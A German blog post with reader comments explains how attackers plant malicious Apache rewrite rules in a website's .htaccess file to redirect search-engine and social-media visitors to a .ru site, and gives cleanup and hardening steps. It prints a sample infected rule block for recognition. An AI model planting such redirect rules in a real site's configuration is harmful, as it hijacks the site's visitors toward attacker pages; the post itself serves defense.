Leider passiert es immer öfter, dass Angreifer eine Webseite mir Rewrite-Rules infizieren.
Symptom:
Wenn Sie ein Suchergebnis ihrer Webseite in einer Suchmaschine wie z.B. Google anklicken werden Sie auf eine andere Webseite (meist *.ru) weitergeleitet. Gleiches gilt für Links aus Twitter, MySpace uvm…
Ursache:
Ein Eindringling hat die htaccess-Datei in ihrem Webverzeichnis mit Rewrite-Rules infiziert.
Beispiel der infizierten htaccess-Datei:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://zieladresse .ru/targetfile/index.php [R=301,L]
Die oben genannten Einträge sind Beispiele für eine infizierte htaccess-Datei, bei ihnen können die Angreifer auch andere/mehr Einträge (Rewrite-Rules) hinterlassen haben.
Unter “RewriteCond” wird ermittelt woher Sie kommen – z.B. Google – und unter “RewriteRule” wird die Zieladresse auf die Sie weitergeleitet werden definiert.
Rewrite-Rules aus der infizierten htaccess-Datei entfernen
Lösung:
Führen Sie einen lokalen Virenscan mit aktuellen Virensignaturen auf Ihrem PC durch.
Ändern Sie ihr FTP-Passwort.
Löschen Sie alle Einträge des Angreifers aus der infizierten htaccess-Datei. Falls Sie keine htaccess-Datei für ihre Webseite benötigen, dann löschen Sie diese komplett!
Falls Sie ein CMS wie WordPress, Joomla, Drupal o.ä. verwenden, erstellen Sie die htaccess-Datei am besten neu oder spielen Sie diese aus einem Backup zurück.
Schreibrechte für htaccess-Datei auf “nur lesen” setzen = “444″.
Bei Verwendung eines CMS darauf achten, dass ihr CMS-System die htaccess-Datei dann aber auch nur noch lesen, aber nicht mehr ändern kann. Änderungen müssen in Zukunft also manuell durchgeführt werden.
Desweiteren ist es sinnvoll gerade bei der Verwendug von CMS-Systemen die Security-Hinweise der verwendeten Plugins zu beachten – oftmals ist hier die Sicherheitslücke zufinden, die die Angreifer benutzt haben um die htaccess-Datei mit Rewrite-Rules zu infizieren.
Wie immer gilt:
- Die Webseite (CMS-System) immer mit aktuellen Sicherheits-Updates/Patches versehen.
- Regelmäßige Backups anfertigen.
Bis neulich,
Frieder Morneweg
super tipp! habe die einträge aus htaccess datei gelöscht und alles funktiniert wieder perfekt! danke
…hat bei mir auch geholfen!
Leider kann ich die rechte der htaccess-Datei nicht auf “444″ setzen, da ich per SEO-Tool meine Urls sauber umleite… Hast du zu Joomla und Suchmaschinen-freundlichen Urls einen Tipp? Wäre klasse!
Dirk
Hallo Dirk,
versuche es mal die Rechte der htaccess-Datei per FTP-Programm auf “644″ zu setzen.
Sollte funktionieren – zumindest bei OpenSEF
!
MfG
Frieder
Hey Danke! Dein Tipp mit htaccess und Joomla funktioniert perfekt!
Ja nutze OpenSEF, sorry hatte das zuvor vergessen zu erwähnen.
Dirk
danke für die info! bei mir war das loch in einer ungepatchen joomla installation! wie ich das hasse! werde wohl das cms wechseln – danke
Also das kann dir bei jedem CMS passieren, nicht nur bei Joomla. Allerdings haben es Hacker natürlich vermehrt auf die beliebtesten CMS-Systeme abgesehen.
Wie Frieder schon schreibt, musst du so schnell wie nur möglich nach der Veröffentlichung von neuen Security-Patches diese auch einspielen.
Gleiches gilt auch für Plugins. Bei mir wurde durch ein fehlerhaftes Plugin meine WordPress-Installation gehackt. Naja aus erfahrung lernt man – jetzt lege ich regelmäßig eine Sicherung meiner Webseite an
Gruß Uwe